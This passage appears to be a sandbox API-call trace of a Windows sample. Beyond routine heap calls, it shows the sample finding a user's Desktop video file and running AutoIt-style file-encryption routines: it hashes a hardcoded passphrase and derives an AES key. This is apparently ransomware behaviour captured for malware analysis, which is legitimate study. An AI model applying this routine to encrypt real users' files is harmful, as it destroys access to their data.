lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0132.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0132.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca9e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0132.350] CloseHandle (hObject=0x258) returned 1 [0132.350] FreeLibrary (hLibModule=0x772d0000) returned 1 [0132.350] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0132.350] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d0c400, ftCreationTime.dwHighDateTime=0x1d5ebc6, ftLastAccessTime.dwLowDateTime=0x6603a40, ftLastAccessTime.dwHighDateTime=0x1d5eb48, ftLastWriteTime.dwLowDateTime=0x6603a40, ftLastWriteTime.dwHighDateTime=0x1d5eb48, nFileSizeHigh=0x0, nFileSizeLow=0x13c5b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Jk_T2yqTjjg2-B-HH.flv", cAlternateFileName="JK_T2Y~1.FLV")) returned 0x41ac2c0 [0132.351] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0132.351] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0132.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0132.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0132.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0132.351] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0132.352] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0132.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.352] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0132.352] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.352] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.352] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.352] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0132.352] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0132.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0132.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0132.352] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0132.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0132.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caec8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0132.353] CryptHashData (hHash=0x41abfc0, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0132.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.353] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae98, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0132.353] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac200) returned 1 [0132.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0132.353] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0132.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0132.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0132.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0132.354] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0132.354] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0132.404] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0132.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0132.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.404] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\jk_t2yqtjjg2-b-hh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0132.405] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.405] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.405] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0132.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0132.406] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0132.406] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0132.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0132.407] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0132.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) 